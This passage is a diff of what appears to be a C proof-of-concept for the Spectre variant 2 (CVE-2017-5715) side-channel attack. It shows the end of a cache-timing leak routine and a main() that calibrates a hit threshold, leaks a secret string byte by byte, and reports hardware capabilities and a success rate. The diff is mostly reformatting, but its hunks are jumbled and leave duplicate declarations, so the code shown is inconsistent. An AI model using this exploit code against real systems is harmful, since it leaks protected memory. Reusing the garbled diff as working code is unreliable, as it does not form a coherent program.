+				j = i;
-        
+			}
-        	/* Locate highest results in j */
+		}
-        	j = -1;
+		if (results[j] >= 3) {
-        	for (i = 0; i < 256; i++) {
+			break;
-        		if (j < 0 || results[i] >= results[j]) {
+		}
        			j = i;
        		}
        	}
        	if (results[j] >= 3)
        		break;
 	}
 	results[0] ^= junk; /* use junk so code above won’t get optimized out*/
 	value[0] = (uint8_t) j;
 	score[0] = results[j];
 }
 int 
-main(
+main(int argc, char** argv) 
                int     argc,
                char**  argv
        ) 
 {
-        target = (uint64_t*)malloc(sizeof(uint64_t));
+	int 		o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
-	int		o;
+	uint8_t 	value[2];
-	//size_t 		malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
+	char*		addr = secret;
 	int 		score[2], len = (int)strlen(secret);
  	uint8_t 	value[2];
  	unsigned 	successes = 0;
  	int		json = 0;
  	char		*addr = secret;
 	while ((o = getopt(argc, argv, "t:j")) != EOF) {
 		switch (o) {
 			case 't':
 				cache_hit_threshold = atoi(optarg);
 				break;
-                        case 'j':
+			case 'j':
 				json++;
-                                break;
+				break;
 			default:
 			usage:
 				fprintf(stderr, "usage: %s [-j] "
-			    "[-t threshold]\n"
+				"[-t threshold]\n"
-			    "\t-j\t\tJSON output\n"
+				"\t-j\t\tJSON output\n"
-                            "\t-t INT\t\tfixed threshold\n", argv[0]);
+				"\t-t INT\t\tfixed threshold\n", argv[0]);
 				return 1;
 		}
 	}
-	if (argc != optind)
+	if (argc != optind) {
 		goto usage;
 	}
-	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ",
+	target = (uint64_t*)malloc(sizeof(uint64_t));
-		argv[0] + 2,
+	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len);
 		len);
 	calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
 	#ifdef NOCLFLUSH
-        for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
+		for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
-                cache_flush_array[i] = 1;
+			cache_flush_array[i] = 1;
-        }
+		}
 	#endif
 	//for (i = 0; i < (int)sizeof(array2); i++)
 	//	array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
 	while (--len >= 0) {
 		leak(addr++, value, score, cache_hit_threshold);
 		if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
@ -375,40 +207,37 @@ main(
 	if (json) {
 		printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
 		#ifndef NORDTSCP
-        	printf("\"rdtscp\": true, ");
+			printf("\"rdtscp\": true, ");
-        	#else
+		#else
-        	printf("\"rdtscp\": false, ");
+			printf("\"rdtscp\": false, ");
-        	#endif
+		#endif
-       		#ifndef NOMFENCE
+	 	#ifndef NOMFENCE
-        	printf("\"mfence\": true, ");
+			printf("\"mfence\": true, ");
-        	#else
+		#else
-        	printf("\"mfence\": false, ");
+			printf("\"mfence\": false, ");
-        	#endif
+		#endif
-        	#ifndef NOCLFLUSH
+		#ifndef NOCLFLUSH
-        	printf("\"clflush\": true ");
+			printf("\"clflush\": true ");
-        	#else
+		#else
-        	printf("\"clflush\": false ");
+			printf("\"clflush\": false ");
-        	#endif
+		#endif
-        	printf("}, ");
+		printf("}, ");
 		printf("\"threshold\": %d, ", cache_hit_threshold);
-		printf("\"success\": %.0f } }",
+		printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
 			100 * successes / (float)strlen(secret));	
 	}
 	fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
 	#ifndef NORDTSCP
-        fprintf(stderr, "RDTSCP ");
+		fprintf(stderr, "RDTSCP ");
-        #else
+	#else
-        fprintf(stderr, "RDTSC ");
+		fprintf(stderr, "RDTSC ");
-        #endif
+	#endif
-       	#ifndef NOMFENCE
+	#ifndef NOMFENCE
-        fprintf(stderr, "MFENCE ");
+		fprintf(stderr, "MFENCE ");
-        #endif
+	#endif
-        #ifndef NOCLFLUSH
+	#ifndef NOCLFLUSH
-        fprintf(stderr, "CLFLUSH ");
+		fprintf(stderr, "CLFLUSH ");
-        #endif
+	#endif
-	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", 
+	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
 		cache_hit_threshold,
 		100 * successes / (float)strlen(secret));
        free(target);
 	return 0;
 }